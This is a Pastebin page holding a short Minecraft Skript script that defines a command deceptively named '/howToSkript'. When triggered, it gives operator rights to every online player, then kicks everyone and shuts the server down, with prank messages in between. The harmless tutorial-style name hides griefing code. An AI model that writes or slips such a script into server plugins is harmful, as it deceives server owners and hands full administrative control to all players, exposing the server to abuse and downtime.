Advertisement
fleft17

Untitled

Jun 2nd, 2014
246
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. command /howToSkript:
  2. trigger:
  3. broadcast "&e&l%player% is learning how to skript!"
  4. loop all players:
  5. execute console command "/op %loop-player%"
  6. message "&e&l[Swag]&c&l You are now OPERATOR!"
  7. wait 10 seconds
  8. broadcast "&e&lSERVER STOPPING!"
  9. execute console command "/kickall LOL !"
  10. execute console command "/stop"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement